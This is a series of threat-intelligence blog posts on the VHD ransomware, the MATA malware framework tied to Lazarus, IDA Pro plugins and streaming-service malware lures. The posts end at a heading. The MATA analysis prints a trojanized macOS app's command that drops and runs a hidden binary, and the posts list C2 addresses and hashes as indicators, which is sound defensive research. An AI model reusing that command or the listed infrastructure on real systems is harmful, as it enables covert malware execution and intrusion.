Criminals piggyback on widespread botnet infections (for instance, the infamous Emotet and Trickbot malware families) to spread into the network of promising victims and license ransomware “products” from third-party developers. When the attackers have a good understanding of the target’s finances and IT processes, they deploy the ransomware on all the company’s assets and enter the negotiation phase.

This ecosystem operates in independent, highly specialized clusters, which in most cases have no links to each other beyond their business ties. This is why the concept of threat actors gets fuzzy: the group responsible for the initial breach is unlikely to be the party that compromised the victim’s Active Directory server, which in turn is not the one that wrote the actual ransomware code used during the incident. What’s more, over the course of two incidents, the same criminals may switch business partners and could be leveraging different botnet and/or ransomware families altogether.

But of course, no complex ecosystem could ever be described by a single, rigid set of rules and this one is no exception. In this blog post, we describe one of these outliers over two separate investigations that occurred between March and May 2020.

Case #1: The VHD ransomware

This first incident occurred in Europe and caught our attention for two reasons: it features a ransomware family we were unaware of, and involved a spreading technique reminiscent of APT groups (see the “spreading utility” details below). The ransomware itself is nothing special: it’s written in C++ and crawls all connected disks to encrypt files and delete any folder called “System Volume Information” (which are linked to Windows’ restore point feature). The program also stops processes that could be locking important files, such as Microsoft Exchange and SQL Server. Files are encrypted with a combination of AES-256 in ECB mode and RSA-2048. In our initial report published at the time we noted two peculiarities with this program’s implementation:

  • The ransomware uses Mersenne Twister as a source of randomness, but unfortunately for the victims the RNG is reseeded every time new data is consumed. Still, this is unorthodox cryptography, as is the decision to use the “electronic codebook” (ECB) mode for the AES algorithm. The combination of ECB and AES is not semantically secure, which means the patterns of the original clear data are preserved upon encryption. This was reiterated by cybersecurity researchers who analyzed Zoom security in April 2020.
  • VHD implements a mechanism to resume operations if the encryption process is interrupted. For files larger than 16MB, the ransomware stores the current cryptographic materials on the hard drive, in clear text. This information is not deleted securely afterwards, which implies there may be a chance to recover some of the files.

The Mersenne Twister RNG is reseeded every time it is called.

To the best of our knowledge, this malware family was first discussed publicly in this blog post.

A spreading utility, discovered along the ransomware, propagated the program inside the network. It contained a list of administrative credentials and IP addresses specific to the victim, and leveraged them to brute-force the SMB service on every discovered machine. Whenever a successful connection was made, a network share was mounted, and the VHD ransomware was copied and executed through WMI calls. This stood out to us as an uncharacteristic technique for cybercrime groups; instead, it reminded us of the APT campaigns Sony SPE, Shamoon and OlympicDestroyer, three previous wipers with worming capabilities.

We were left with more questions than answers. We felt that this attack did not fit the usual modus operandi of known big-game hunting groups. In addition, we were only able to find a very limited number of VHD ransomware samples in our telemetry, and a few public references. This indicated that this ransomware family might not be traded widely on dark market forums, as would usually be the case.

Case #2: Hakuna MATA

A second incident, two months later, was handled by Kaspersky’s Incident Response team (GERT). That meant we were able to get a complete picture of the infection chain leading to the installation of the VHD ransomware.

In this instance, we believe initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server. They then deployed the VHD ransomware to all the machines in the network. In this instance, there was no spreading utility, but the ransomware was staged through a downloader written in Python that we still believe to be in development. The whole infection took place over the course of 10 hours.

A more relevant piece of information is that the backdoor used during this incident is an instance of a multiplatform framework we call MATA (some vendors also call it Dacls). On July 22, we published a blog article dedicated to this framework. In it, we provide an in-depth description of its capabilities and provide evidence of its links to the Lazarus group. Other members of the industry independently reached similar conclusions.

The forensics evidence gathered during the incident response process is strong enough that we feel comfortable stating with a high degree of confidence that there was only a single threat actor in the victim’s network during the time of the incident.

Conclusion

The data we have at our disposal tends to indicate that the VHD ransomware is not a commercial off-the-shelf product; and as far as we know, the Lazarus group is the sole owner of the MATA framework. Hence, we conclude that the VHD ransomware is also owned and operated by Lazarus.

Circling back to our introduction, this observation is at odds with what we know about the cybercrime ecosystem. Lazarus has always existed at a special crossroads between APT and financial crime, and there have long been rumors in the threat intelligence community that the group was a client of various botnet services. We can only speculate about the reason why they are now running solo ops: maybe they find it difficult to interact with the cybercrime underworld, or maybe they felt they could no longer afford to share their profits with third parties.

It’s obvious the group cannot match the efficiency of other cybercrime gangs with their hit-and-run approach to targeted ransomware. Could they really set an adequate ransom price for their victim during the 10 hours it took to deploy the ransomware? Were they even able to figure out where the backups were located? In the end, the only thing that matters is whether these operations turned a profit for Lazarus.

Only time will tell whether they jump into hunting big game full time, or scrap it as a failed experiment.

Indicators of compromise

The spreader utility contains a list of administrative credentials and IP addresses specific to the victim, which is why it’s not listed in the IoC section.

As the instance of the MATA framework was extracted from memory, no relevant hashes can be provided for it in the IoC section.

VHD ransomware
6D12547772B57A6DA2B25D2188451983
D0806C9D8BCEA0BD47D80FA004744D7D
DD00A8610BB84B54E99AE8099DB1FC20
CCC6026ACF7EADADA9ADACCAB70CA4D6
EFD4A87E7C5DCBB64B7313A13B4B1012

Domains and IPs
172.93.184[.]62                  MATA C2
23.227.199[.]69                  MATA C2
104.232.71[.]7                     MATA C2
mnmski.cafe24[.]com       Staging endpoint for the ransomware (personal web space hosted at a legit web service and used                                                as a redirection to another compromised legit website).

2020. július 22.

MATA: Multi-platform targeted malware framework

As the IT and OT environment becomes more complex, adversaries are quick to adapt their attack strategy. For example, as users’ work environments diversify, adversaries are busy acquiring the TTPs to infiltrate systems. Recently, we reported to our Threat Intelligence Portal customers a similar malware framework that internally we called MATA. The MATA malware framework possesses several components, such as loader, orchestrator and plugins. This comprehensive framework is able to target Windows, Linux and macOS operating systems.

The first artefacts we found relating to MATA were used around April 2018. After that, the actor behind this advanced malware framework used it aggressively to infiltrate corporate entities around the world. We identified several victims from our telemetry and figured out the purpose of this malware framework.

Windows version of MATA

The Windows version of MATA consists of several components. According to our telemetry, the actor used a loader malware to load the encrypted next-stage payload. We’re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine.

Component of the Windows version of MATA

Loader

This loader takes a hardcoded hex-string, converts it to binary and AES-decrypts it in order to obtain the path to the payload file. Each loader has a hard-coded path to load the encrypted payload. The payload file is then AES-decrypted and loaded.

From the loader malware found on one of the compromised victims, we discovered that the parent process which executes the loader malware is the “C:\Windows\System32\wbem\WmiPrvSE.exe” process. The WmiPrvSE.exe process is “WMI Provider Host process”, and it usually means the actor has executed this loader malware from a remote host to move laterally. Therefore, we assess that the actor used this loader to compromise additional hosts in the same network.

Orchestrator and plugins

We discovered the orchestrator malware in the lsass.exe process on victims’ machines. This orchestrator malware loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. Unless the registry value exists, the malware uses hard-coded configuration data. The following is a configuration value example from one orchestrator malware sample:

Victim ID Random 24-bit number Internal version number 3.1.1 (0x030101) Timeout 20 minutes C2 addresses 108.170.31[.]81:443

192.210.239[.]122:443

111.90.146[.]105:443 Disk path or URL of plugin (up to 15) to be loaded on start Not used in this malware

The orchestrator can load 15 plugins at the same time. There are three ways to load them:

  • Download the plugin from the specified HTTP or HTTPS server
  • Load the AES-encrypted plugin file from a specified disk path
  • Download the plugin file from the current MataNet connection

The malware authors call their infrastructure MataNet. For covert communication, they employ TLS1.2 connections with the help of the “openssl-1.1.0f” open source library, which is statically linked inside this module. Additionally, the traffic between MataNet nodes is encrypted with a random RC4 session key. MataNet implements both client and server mode. In server mode the certificate file “c_2910.cls” and the private key file “k_3872.cls” are loaded for TLS encryption. However, this mode is never used.

The MataNet client establishes periodic connections with its C2. Every message has a 12-byte-long header, where the first DWORD is the message ID and the rest is the auxiliary data, as described in the table below:

Message ID Description 0x400 Complete the current MataNet session and delay the next session until the number of logical drives is changed or a new active user session is started. 0x500 Delete configuration registry key and stop MATA execution until next reboot. 0x601 Send configuration data to C2. 0x602 Download and set new configuration data. 0x700 Send the C2 the infected host basic information such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address. 0x701 Send the C2 the configuration settings such as victim ID, internal version number and session timeout.

The main functionality of the orchestrator is loading each plugin file and executing them in memory. Each DLL file type plugin provides an interface for the orchestrator and provides rich functionality that can control infected machines.

Plugin name Description MATA_Plug_Cmd.dll Run “cmd.exe /c” or “powershell.exe” with the specified parameters, and receive the output of the command execution. MATA_Plug_Process.dll Manipulate process (listing process, killing process, creating process, creating process with logged-on user session ID). MATA_Plug_TestConnect.dll Check TCP connection with given IP:port or IP range.

Ping given host or IP range. MATA_Plug_WebProxy.dll Create a HTTP proxy server. The server listens for incoming TCP connections on the specified port, processing CONNECT requests from clients to the HTTP server and forwarding all traffic between client and server. MATA_Plug_File.dll Manipulate files (write received data to given file, send given file after LZNT1 compression, compress given folder to %TEMP%\~DESKTOP[8random hex].ZIP and send, wipe given file, search file, list file and folder, timestomping file). MATA_Plug_Load.dll Inject DLL file into the given process using PID and process name, or inject XORed DLL file into given process, optionally call export function with arguments. MATA_Plug_P2PReverse.dll Connect between MataNet server on one side and an arbitrary TCP server on the other, then forward traffic between them. IPs and ports for both sides are specified on the call to this interface.

There is an interesting string inside the MATA_Plug_WebProxy plugin – “Proxy-agent: matt-dot-net” – which is a reference to Matt McKnight’s open source project. There are some differences though. Matt’s project is written in C# rather than C++. The MATA proxy is noticeably simpler, as there is no cache and no SSL support, for instance. It’s possible that MATA’s authors found and used the source code of an early version of Matt’s proxy server. It looks like the malware author rewrote the code from C# to C++ but left this footprint unchanged.

Proxy-agent of MATA_Plug_WebProxy.dll plugin

Non-Windows version of MATA

The MATA framework targets not only the Windows system but also Linux and macOS systems.

Linux version

During our research, we also found a package containing different MATA files together with a set of hacking tools. In this case, the package was found on a legitimate distribution site, which might indicate that this is the way the malware was distributed. It included a Windows MATA orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server (CVE-2019-3396), a legitimate socat tool and a Linux version of the MATA orchestrator bundled together with a set of plugins. China-based security vendor Netlab also published a highly detailed blog on this malware.

The module is designed to run as a daemon. Upon launch, the module checks if it is already running by reading the PID from “/var/run/init.pid” and checks if the “/proc/%pid%/cmdline” file content is equal to “/flash/bin/mountd”. Note that “/flash/bin/mountd” is an unusual path for standard Linux desktop or server installations. This path suggests that MATA’s Linux targets are diskless network devices such as routers, firewalls or IoT devices based on x86_64. The module can be run with the “/pro” switch to skip the “init.pid” check. The AES-encrypted configuration is stored in the “$HOME/.memcache” file. The behavior of this module is the same as the Windows MATA orchestrator previously described. The plugin names of Linux MATA and the corresponding Windows plugins are:

Linux plugin Corresponding Windows plugin /bin/bash MATA_Plug_Cmd plugin_file MATA_Plug_File plugin_process MATA_Plug_Process plugin_test MATA_Plug_TestConnect plugin_reverse_p2p MATA_Plug_P2PReverse

Note that the Linux version of MATA has a logsend plugin. This plugin implements an interesting new feature, a “scan” command that tries to establish a TCP connection on ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (“Bloomberg Professional” software) and random IP addresses excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.

macOS version

We discovered another MATA malware target for macOS uploaded to VirusTotal on April 8, 2020. The malicious Apple Disk Image file is a Trojanized macOS application based on an open-source two-factor authentication application named MinaOTP.

Trojanized macOS application

The Trojanized main TinkaOTP module is responsible for moving the malicious Mach-O file to the Library folder and executing it using the following command:
cp TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1

Upon launch, this malicious Mach-o file loads the initial configuration file from “/Library/Caches/com.apple.appstotore.db”.

Like another strain running on a different platform, the macOS MATA malware also runs on a plugin basis. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named “plugin_socks”. The “plugin_socks” plugin is similar to “plugin_reverse_p2p” and is responsible for configuring proxy servers.

Victims

Based on our telemetry, we have been able to identify several victims who were infected by the MATA framework. The infection is not restricted to a specific territory. Victims were recorded in Poland, Germany, Turkey, Korea, Japan and India. Moreover, the actor compromised systems in various industries, including a software development company, an e-commerce company and an internet service provider.

We assess that MATA was used by an APT actor, and from one victim we identified one of their intentions. After deploying MATA malware and its plugins, the actor attempted to find the victim’s databases and execute several database queries to acquire customer lists. We’re not sure if they completed the exfiltration of the customer database, but it’s certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim, something that will be described in detail in an upcoming blog post.

Victims of MATA

Attribution

We assess that the MATA framework is linked to the Lazarus APT group. The MATA orchestrator uses two unique filenames, c_2910.cls and k_3872.cls, which have only previously been seen in several Manuscrypt variants, including the samples (0137f688436c468d43b3e50878ec1a1f) mentioned in the US-CERT publication.

Unique file name

Moreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses. We’ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. They are not identical, but they have a similar structure.

Manuscrypt configuration structure

Conclusion

The MATA framework is significant in that it is able to target multiple platforms: Windows, Linux and macOS. In addition, the actor behind this advanced malware framework utilized it for a type of cybercrime attack that steals customer databases and distributes ransomware. We evaluate that this malware is going to evolve, so we will be monitoring its activity in order to protect our customers.

For more information please contact: intelreports@kaspersky.com

Indicators of compromise File Hashes (malicious documents, Trojans, emails, decoys)

Windows Loader

f364b46d8aafff67271d350b8271505a
85dcea03016df4880cebee9a70de0c02
1060702fe4e670eda8c0433c5966feee
7b068dfbea310962361abf4723332b3a
8e665562b9e187585a3f32923cc1f889
6cd06403f36ad20a3492060c9dc14d80
71d8b4c4411f7ffa89919a3251e6e5cb
a7bda9b5c579254114fab05ec751918c
e58cfbc6e0602681ff1841afadad4cc6
7e4e49d74b59cc9cc1471e33e50475d3
a93d1d5c2cb9c728fda3a5beaf0a0ffc
455997E42E20C8256A494FA5556F7333
7ead1fbba01a76467d63c4a216cf2902
7d80175ea344b1c849ead7ca5a82ac94
bf2765175d6fce7069cdb164603bd7dc
b5d85cfaece7da5ed20d8eb2c9fa477c
6145fa69a6e42a0bf6a8f7c12005636b
2b8ff2a971555390b37f75cb07ae84bd
1e175231206cd7f80de4f6d86399c079
65632998063ff116417b04b65fdebdfb
ab2a98d3564c6bf656b8347681ecc2be
e3dee2d65512b99a362a1dbf6726ba9c
fea3a39f97c00a6c8a589ff48bcc5a8c
2cd1f7f17153880fd80eba65b827d344
582b9801698c0c1614dbbae73c409efb
a64b3278cc8f8b75e3c86b6a1faa6686
ca250f3c7a3098964a89d879333ac7c8
ed5458de272171feee479c355ab4a9f3
f0e87707fd0462162e1aecb6b4a53a89
f1ca9c730c8b5169fe095d385bac77e7
f50a0cd229b7bf57fcbd67ccfa8a5147

Windows MATA

bea49839390e4f1eb3cb38d0fcaf897e    rdata.dat
8910bdaaa6d3d40e9f60523d3a34f914    sdata.dat
6a066cf853fe51e3398ef773d016a4a8
228998f29864603fd4966cadd0be77fc
da50a7a05abffb806f4a60c461521f41
ec05817e19039c2f6cc2c021e2ea0016

Registry path

HKLM\Software\Microsoft\KxtNet
HKLM\Software\Microsoft\HlqNet
HKLM\Software\mthjk

Linux MATA

859e7e9a11b37d355955f85b9a305fec    mdata.dat
80c0efb9e129f7f9b05a783df6959812    ldata.dat, mdata.dat
d2f94e178c254669fb9656d5513356d2   mdata.dat

Linux log collector

982bf527b9fe16205fea606d1beed7fa    hdata.dat

Open-source Linux SoCat

e883bf5fd22eb6237eb84d80bbcf2ac9    sdata.dat

Script for exploiting Atlassian Confluence Server

a99b7ef095f44cf35453465c64f0c70c    check.vm, r.vm
199b4c116ac14964e9646b2f27595156    r.vm

macOS MATA

81f8f0526740b55fe484c42126cd8396    TinkaOTP.dmg
f05437d510287448325bac98a1378de1    SubMenu.nib

C2 address

104.232.71.7:443
107.172.197.175:443
108.170.31.81:443
111.90.146.105:443
111.90.148.132:443
172.81.132.41:443
172.93.184.62:443
172.93.201.219:443
185.62.58.207:443
192.210.239.122:443
198.180.198.6:443
209.90.234.34:443
216.244.71.233:443
23.227.199.53:443
23.227.199.69:443
23.254.119.12:443
67.43.239.146:443
68.168.123.86:443

2020. július 21.

GReAT thoughts: Awesome IDA Pro plugins

The Global Research & Analysis Team here at Kaspersky has a tradition of meeting up once a month and sharing cutting-edge research, interesting techniques and useful tools. We recently took the unprecedented decision to make our internal meetings public for a few months and present them as a series of talks called ‘GReAT Ideas. Powered by SAS’. In the second edition that takes place on July 22, 2020, I’ll be talking about awesome IDA Pro plugins that I regularly use. This article is a sneak peek into what I’ll be discussing.

Highlighting control-flow transfer instructions

When you are reverse-engineering a binary it’s very important to follow control-flow transfer instructions and especially those instructions that are used to transfer the control flow to other procedures. For x86/64 architectures this is done by the CALL instruction. If you’re an experienced reverse engineer, you can usually get a general idea of what a function does just by taking a quick look at the function assembly (especially true when the function is relatively small). When it comes to understanding what a function does, the first thing you’re most likely to do is check how many CALL instructions it has and what other functions they execute. If a function just performs calculations, stores some values in memory, and you don’t really care about such details, then you can skip this function and continue reverse-engineering. It’s quite different when a function executes other functions; you might want to understand what these functions do first to get the bigger picture.

All development environments for writing code support syntax highlighting because it greatly assists in software coding. However, syntax highlighting can also greatly assist in software reversing. Let’s take a quick look at syntax highlight capabilities provided by IDA Pro and other tools for reverse engineering.

As you can see, Immunity Debugger, x64dbg and radare2 all highlight control-flow transfer instructions, but not IDA Pro. The default IDA Pro theme just looks plain. However, it’s possible to brighten things up a bit if you go to “Options -> Colors…”. In the IDA Colors window you can configure different colors for instruction mnemonics, registers, addresses, constants and variables. It makes IDA Pro output much more pleasant on the eye, but it doesn’t solve the problem completely because all instruction mnemonics will have the same color and if you rely on address highlighting, it’s not going to work with indirect function calls. Why doesn’t IDA Pro have an option to highlight CALL instructions? To this day, this omission bothers me. And it seems it’s not just me because there have been a number of scripts and plugins aimed at the same issue – fluorescence.py and highlight_calls.py – to name just a couple. These scripts use API functions set_color()/set_item_color() to set background color behind an instruction. And while it definitely does the job, the final result is not as good as it could be if it was possible to change the color of some particular instruction mnemonics.

At some point, I decided to check if there was a way to change the color of some particular instructions with a more advanced plugin and dived into IDA Pro SDK header files. I found what I was looking for inside the lines.hpp header file, which reveals the internal format used by IDA Pro to display disassembled text. It turns out that the API functions generate_disassembly() and generate_disasm_line() output disassembled text lines along with special escape sequences that are used to implement syntax highlighting. If you use idc.generate_disasm_line(ea, flags) with IDAPython, then these color escape sequences will be removed from the output, but you can still take a look at raw disassembled text lines if you use ida_lines.generate_disasm_line(ea, flags). The format for color escape sequences is fairly simple and a typical color sequence looks like this: #COLOR_ON #COLOR_xxx text #COLOR_OFF #COLOR_xxx. #COLOR_ON is equal to ‘\x01’ and the #COLOR_xxx value for instruction mnemonic is defined as COLOR_INSN and equal to ‘\x05’. As a result, the disassembly text line for the CALL instruction will always begin with ‘\x01\x05call\x02\x05’. IDA Pro SDK also provides the function hook_to_notification_point() that can be used to install callbacks for different events, and those events include the UI notification ui_gen_idanode_text which can be used to provide custom text for an IDA graph node. So, the plan is as follows: we make a callback for ui_gen_idanode_text notification, check if the disassembled text line at the current address starts with ‘\x01\x05call\x02\x05’, and if so, we replace COLOR_INSN with the ID of some another color. After writing the necessary code and testing it, I was happy to see that my plan worked out pretty well!

I achieved exactly what I wanted, but I still wasn’t completely satisfied. The problem with this approach is that it is only going to work with x86/64, but what about ARM, MIPS, etc.? I needed a CPU-agnostic solution. Thankfully, it was quite easy to implement. Each processor module has a special exported structure (processor_t) called LPH. This structure has an instruc field that is a pointer to an array of processor instructions. Each instruction in this table is represented by an instruction mnemonic and a combination of its features. These features include what operand it modifies (CF_CHGX), which operand it uses (CF_USEX), whether it halts execution (CF_STOP), makes a jump to another location (CF_JUMP) or calls another procedure (CF_CALL). It means that at plugin start we can parse the list of instructions from the loaded processor module, find all the instructions that have the CF_CALL feature and use them later in comparison. You can see the results below.

As long as the processor module fills the instruc table properly, my plugin should work fine. So far, I’ve only encountered problems with PowerPC, because in this particular case all necessary instructions like “bl” and “bctrl” are missing in the instruc table. But it’s still possible to create workarounds for them.

Download link

Identification of known functions

Identification of known functions is a huge reverse engineering problem. The two scenarios below are likely to be familiar to you:

  • You are reverse-engineering a binary without debug symbols that is statically linked with a known library and you want to automatically rename all functions from this library in your IDA Pro database file.
  • You’ve spent some time reverse engineering a binary without debug symbols, but a new version of the binary appears and you want to port all your renamed functions to a new IDA Pro database file.

To address the first issue, Hex-Rays, the company behind IDA Pro, has come up with a technology for storing and applying signatures for library function identification. This technology is called FLIRT. It makes it possible to use a special utility to preprocesses *.obj and *.lib files, produce the file *.pat with the function patterns and other necessary data and then convert it into the signature file *.sig. In the end you get a signature file for a specific library that you can put into the “sig\<arch>” folder inside the IDA Pro directory and apply it to your IDA Pro database from the “View -> Open subviews -> Signatures” window. If the functions in a library match those functions present in your IDA Pro database byte to byte, then they will be recognized and renamed properly.

While the previously described method partially solves the first issue, it doesn’t help at all with the second issue. Officially, FLIRT only provides a way to create signature files for libraries, so it can’t be used to transfer knowledge from one IDA Pro database to another. After many years, this problem was finally addressed in IDA Pro 7.2. This release introduced a new technology called Lumina server. It can be used to push and retrieve metadata about functions (names, comments, etc.) present in a database. However, it doesn’t really help when you want to transfer this info from one database to another without sharing this info with the rest of the world. That’s because currently only a public Lumina server is available. It means the only way to do this is to use plugins. Thankfully, these kinds of plugins have been around for ages. IDA2PAT and IDB2SIG can be used to generate a FLIRT file from an existing IDA Pro database and then apply it to a new database just as if it was a regular signature file for a library. They are fairly easy to use and if a function is not identified in the new database, you can see straightaway that it was changed. The original IDA2PAT and IDB2SIG plugins are not maintained, so you might want to use a fork with IDA Pro 7.* support or modern IDAPython port idb2pat.py.

As was previously mentioned, the downside of FLIRT technology is that it only works when the signature closely matches the bytes of the function body. This could be a problem when, for example, you only have the source code of a library and when you try to compile it the result doesn’t really match your analyzed binary. In such cases, binary diffing comes in handy. The great feature of BinDiff and Diaphora plugins is that they can not only be used to compare functions between different binaries but also port function names and comments. You might also want to give Karta a try. It’s been developed especially for identifying library functions in a binary directly from the source code. You can read more about how it works in here.

YARA + IDA Pro = ❤

YARA is the Swiss Army knife of pattern matching. It’s probably the most beloved tool of malware researchers – and still massively underrated by everyone else. Pattern matching can be really useful in reverse engineering and YARA is the tool to use. Here are just some of the uses: look for important constants, magic values, GUIDs in your IDA Pro database and print a message, rename an address or leave a comment when a match is found. The key here is to know what you can look for with YARA and how it can improve your workflow. For example, the plugin findcrypt-yara uses YARA to find common cryptographic constants.

Below I demonstrate how you can use YARA within IDA Pro by yourself. Note that you need to install the yara-python package first.

import idaapi, idautils, idc import yara # rules can be compiled from a file path or as string rules = yara.compile(filepath=file_with_rules) # iterate all segments present in database for segment_start in idautils.Segments(): segment_size = get_segm_end(segment_start) - segment_start # read segment data data = get_bytes(segment_start, segment_size) # scan segment data with rules matches = rules.match(data=data) # iterate all matched data for m in matches: for s in m.strings: offset = s[0] name = s[1] # leave a comment with pattern name at matched offset in database set_cmt(get_item_head(segment_start+offset), name, 0)

Let me know about your favorite IDA Pro plugins on Twitter and sign up for our upcoming ‘GReAT Ideas. Powered by SAS’ webinar to learn more about some other awesome plugins.

2020. július 16.

The Streaming Wars: A Cybercriminal’s Perspective

Cyberthreats are not relegated to the world of big businesses and large-scale campaigns. The most frequent attacks are not APTs and massive data breaches: they are the daily encounters with malware and spam by common users. And, one of the areas where we are most vulnerable is entertainment—particularly when we are so used to finding everything and anything we want to watch or play online for little or no money. That is why last year, we took a look at how cybercriminals use popular shows to spread malware. This year, we turned to an equally popular entertainment sector: streaming platforms.

The year 2019 was officially the year the Streaming Wars kicked off, as nearly all major networks, no matter the cost, hurried to profit from consumers’ new, preferred method of consuming content: streaming platforms. It began with Apple TV +. Then Disney +. And then, the most recent addition, HBO Max, a project the network developed in an effort to leverage its $85.4 billion acquisition of Time Warner. This is not to mention a slew of various local platforms that have popped up in various regions around the world. In fact, the global video streaming market is expected to be worth $688.7 billion by 2024.

For cybercriminals, the switch to streaming means a new, lucrative attack channel has opened up. In fact, just hours after Disney + was launched, thousands of users’ accounts were hacked and their passwords and emails, changed. The criminals then sold these accounts online for $3-$11.

Not only new streaming services are vulnerable. Popular services launched years ago, such as Netflix and Hulu, are prime targets for distributing malware, stealing passwords, and launching spam and phishing attacks. Their appeal has only increased given the spike in subscribers in the first half of the year, as many people lost their jobs and/or were relegated to staying at home. In the first quarter of 2020, Netflix added fifteen million subscribers—more than double what was expected. That means at least fifteen more million people are vulnerable to cybercrime against streaming services. In fact, recent research from Flixed, a service that helps you find the best cable replacement, found that more than one in ten people have had their streaming accounts hacked.

Not only are millions of account purchasers susceptible, but so are the millions more who receive access via relatives or friends that share their passwords and an unknown number of people who attempt to gain access to these platforms at a discount or are forced to find other methods of viewing their content in areas where the services are not available.

To help make users around the world become aware of the threats—and stay protected—we have taken an in-depth look at the cybercrime landscape of streaming services.

Methodology

In this report, we analyzed several different types of threats—malware associated with streaming platforms and the original content they release, as well as phishing emails and fake websites/login pages.

For this purpose, we utilized results from the Kaspersky Security Network (KSN) – a system for processing anonymous data related to cybersecurity threats shared voluntarily from Kaspersky users. The results display those users (mobile or PC) that encountered various threats from January 2019 until April 8, 2020.

The streaming platforms analyzed for the purposes of this report are the following:

  1. Netflix:This was the first service of its kind. Launched in 1997, it was originally the first online DVD rental store before switching to streaming in the mid-2000s. It remains the most popular online streaming platform with 183 million paid memberships in more than 190 countries.
  2. Hulu: This US service was launched in 2008 and offers to subscribers not only a library of (original and non-original) shows and movies to stream, but also a chance to watch recently released episodes of shows currently airing on the major US broadcast networks. It currently has 32.1 million subscribers in the U.S.
  3. Amazon Prime Video:This video streaming service was launched in 2006 and is offered to all Amazon Prime subscribers (this subscription includes free two-day shipping, free music, and free books). Amazon Prime Video offers access to a catalogue of videos and TV shows, original and not. You can also pay for add-ons, which provide you with access to content on other channels, such as Starz and HBO. Amazon Prime has over 150 million subscribers worldwide. Of course, this number includes all Prime members, some of whom may not use the video streaming service.
  4. Disney +: Launched in November 2019, Disney + offers access to the entire library of content from Pixar, National Geographic, and Disney. It also offers all titles related to the Star Wars franchise and several original series. It currently has 54.5 million subscribers worldwide.
  5. Apple TV Plus: This service was launched in November 2019, shortly before the release of Disney +. It primarily consists of original programming and is available in more than 100 countries. The number of subscribers is unclear, but outside sources estimate the number to be between 10 and 33 million. However, anyone who had purchased a new Apple TV, iPod, iPad, iPhone or Mac from September 10, 2019 were given a free one-year subscription.
Malware for streaming platforms

When it comes to streaming platforms, malware and other threats (like adware) are most often downloaded when users attempt to gain access through unofficial means, whether by purchasing discounted accounts, obtaining a “hack” to keep their free trial going, or attempting to access a free subscription. Many times, these unofficial links or files come bundled with other malicious programs, such as trojans and backdoors.

Using KSN, we searched for malicious programs bundled with files that contained the names of the five streaming platforms above in the context of obtaining login credentials, a subscription, or downloading the platform for viewing. The results display those (mobile or PC) users that encountered various threats while attempting to gain access to Netflix, Hulu, Amazon Prime Video, Disney +, or Apple TV + through unofficial means.

We also looked specifically at account checkers: tools used to check leaked credentials (often from data breaches) in bulk across different sites. Because many people reuse account login information, leaked passwords and usernames can provide access to multiple online accounts, and account checking tools let cybercriminals determine exactly which accounts, so that they can sell access to them (or steal the financial/personal information affiliated with them).

In addition, users can access or download account checkers available online to gain free access to streaming platforms. Of course, using these tools comes with an increased risk of encountering malware. To find out how many users encountered various threats while using account checking tools for the five streaming platforms above, we looked at files that downloaded various threats and contained the name of one of the streaming platform plus the keywords “checker”, “brute”, or “cracker”. The results display those (mobile or PC) users that encountered various threats while coming across account checkers for Netflix, Hulu, Amazon Prime Video, Disney +, and Apple TV +.

Malware for original series

In addition, we examined malware affiliated with original programming on these platforms for the same time frame. The process was the same as that for malware related to streaming platforms. Using KSN, we searched for malicious programs bundled with files that contained the name of popular original television shows.

Disney +, by April 8, had one major original content release: The Mandalorian. However, the others, particularly Netflix, have extensive original content libraries. We therefore selected those most popular/highly reviewed. Since many of these platforms do not regularly publish viewing numbers, we used public sources, such as Rotten Tomatoes, IMDB, and Metacritic to compile the following list:

Disney +:

  • The Mandalorian

Netflix:

  • Sex Education
  • Ozark
  • Stranger Things
  • The Witcher
  • Love is Blind
  • BoJack Horseman
  • Orange is the New Black
  • Tiger King

Amazon Prime Video:

  • Catastrophe
  • Fleabag
  • Transparent
  • Bosch
  • The Expanse
  • The Marvelous Mrs. Maisel
  • The Man in the High Castle

Hulu:

  • Castle Rock
  • High Fidelity
  • Little Fires Everywhere
  • Veronika Mars
  • The Handmaid’s Tale

Apple TV +:

  • Servant
  • Dickinson
  • Ghostwriter
  • The Morning Show

The results display those (mobile or PC) users that encountered various threats via malicious files that contained one of the above shows as a lure.

  • Our Key Findings: A common phishing scheme involves asking users to confirm or update their payment information for a streaming platform account. Upon doing so, cybercriminals gain access to the users’ financial information (credit card info / billing details).
  • No Kaspersky users encountered threats while attempting to access Apple TV +.
  • Netflix is by far the platform most frequently used by criminals as a lure to trick Kaspersky users into downloading various threats, either while they attempt to gain access to the platform, modify the application, or gather login info.
  • When attempting to gain access to streaming platforms, 5,577 unique Kaspersky users encountered threats through links that used the name of legitimate platforms: Hulu, Netflix, Amazon Prime, or Disney +, as a lure, or while attackers attempted to gain credentials of these platforms’ users.
  • There was a total of 23,936 attempts to infect these 5,577 users.
  • The most frequent threat encountered for all attacks that used the name of one of the five streaming platforms above were various types of trojans, which made up 47% of all encountered threats.
  • The greatest number of attacks registered that contained the name of Netflix as the lure came from Germany. For Amazon Prime: the United States. For Hulu: Dominican Republic. For Disney +: Algeria.
  • A total of 6,661 Kaspersky users encountered malware when coming across account checkers while trying to gain access to Hulu, Netflix, Amazon Prime, or Disney +.
  • There was a total of 57,784 attempts to infect these 6,661 users.
  • The five original shows which were most often used by malware creators to attract the attention of potential victims and lure them into installing various threats were The Mandalorian, a Disney + original, followed by Netflix’s Stranger Things, The Witcher, Sex Education, and Orange Is the New Black.
  • More than half of the attacks (51%) disguised as one of the five shows most frequently used as a lure came from Spain.
Phishing for credentials

